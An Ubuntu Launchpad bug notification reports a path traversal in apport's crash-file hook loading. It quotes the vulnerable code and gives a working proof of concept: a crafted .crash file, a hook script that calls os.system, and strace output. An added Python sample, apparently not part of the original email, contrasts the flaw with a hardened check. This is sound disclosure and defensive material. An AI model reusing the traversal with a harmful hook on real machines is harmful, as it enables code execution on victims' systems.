[Bug 1700573] Re: Code execution through path traversal in .crash files processing
Ubuntu Foundations Team Bug Bot
1700573 at bugs.launchpad.net
Tue Jul 18 20:21:15 UTC 2017
** Tags added: patch
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1700573
Title:
Code execution through path traversal in .crash files processing
Status in Apport:
Fix Released
Status in apport package in Ubuntu:
Confirmed
Status in apport source package in Trusty:
Fix Released
Status in apport source package in Xenial:
Fix Released
Status in apport source package in Yakkety:
Fix Released
Status in apport source package in Zesty:
Fix Released
Status in apport source package in Artful:
Confirmed
Bug description:
The function add_hooks_info in apport/report.py is vulnerable to a
directory traversal when processing the ExecutablePath key of a
malicious .crash file:
        opt_path = None
        if self.get('ExecutablePath', '').startswith(_opt_dir):
            opt_path = self.get('ExecutablePath', '')
        elif package:
            # check package contents
            try:
                for f in apport.packaging.get_files(package):
                    if f.startswith(_opt_dir) and os.path.isfile(f):
                        opt_path = f
                        break
            except ValueError:
                # uninstalled package
                pass

        if opt_path:
            while len(opt_path) >= len(_opt_dir):
                hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
                opt_path = os.path.dirname(opt_path)
This can be used to execute an arbitrary python script from an attacker-controlled path when a crash file is opened:
fwilhelm at box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
Package: f
fwilhelm at box:~$ cat /tmp/poc/share/apport/package-hooks/f.py
import os
os.system("gnome-calculator")
fwilhelm at bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0
[pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0
The subdirectory requirement makes this a bit tricky to exploit
remotely, but depending on the environment a malicious USB drive, a
shared NFS share or a crash file inside an archive could be used.
Please credit Felix Wilhelm from the Google Security Team in all
releases, patches and advisories related to these issues.
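The following is an added illustration of the check described above, not apport's code and not the fix that shipped: hook_dirs_vulnerable mirrors the bare prefix check from the report, hook_dirs_hardened is a hypothetical replacement that normalises ExecutablePath and requires the result to stay below /opt, and parse_crash / audit_crash / POC_CRASH are names and a constructed input chosen here for the demo.

```python
import posixpath

OPT_DIR = '/opt'

# Constructed stand-in for the reporter's poc.crash (same keys as in the bug).
POC_CRASH = """ProblemType: Bug
ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
Package: f
"""

def parse_crash(text):
    """Minimal 'Key: value' reader for the top-level fields of a .crash file."""
    report = {}
    for line in text.splitlines():
        if line and not line[0].isspace() and ':' in line:
            key, _, value = line.partition(':')
            report[key.strip()] = value.strip()
    return report

def hook_dirs_vulnerable(executable_path, opt_dir=OPT_DIR):
    """Mirror of the reported logic: a bare prefix check, then walk up the raw string."""
    if not executable_path.startswith(opt_dir):
        return []
    dirs, opt_path = [], executable_path
    while len(opt_path) >= len(opt_dir):
        dirs.append(posixpath.join(opt_path, 'share', 'apport', 'package-hooks'))
        opt_path = posixpath.dirname(opt_path)
    return dirs

def hook_dirs_hardened(executable_path, opt_dir=OPT_DIR):
    """Hypothetical fix: normalise first and require the result to lie below opt_dir."""
    norm = posixpath.normpath(executable_path)
    if not posixpath.isabs(norm) or posixpath.commonpath([norm, opt_dir]) != opt_dir:
        return []  # '/opt/../tmp/...' and '/opt2/...' are both rejected here
    dirs, opt_path = [], norm
    while len(opt_path) >= len(opt_dir):
        dirs.append(posixpath.join(opt_path, 'share', 'apport', 'package-hooks'))
        opt_path = posixpath.dirname(opt_path)
    return dirs

def audit_crash(text, opt_dir=OPT_DIR):
    """Return (normalised ExecutablePath, dirs the vulnerable check searches, dirs the hardened check searches)."""
    exe = parse_crash(text).get('ExecutablePath', '')
    return posixpath.normpath(exe), hook_dirs_vulnerable(exe, opt_dir), hook_dirs_hardened(exe, opt_dir)

if __name__ == '__main__':
    norm, vuln, safe = audit_crash(POC_CRASH)
    print(norm, vuln, safe)
```

Note that the prefix check also accepts paths such as /opt2/x that merely share the string prefix; the normalised commonpath comparison rejects those as well.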
To manage notifications about this bug go to:
https://bugs.launchpad.net/apport/+bug/1700573/+subscriptions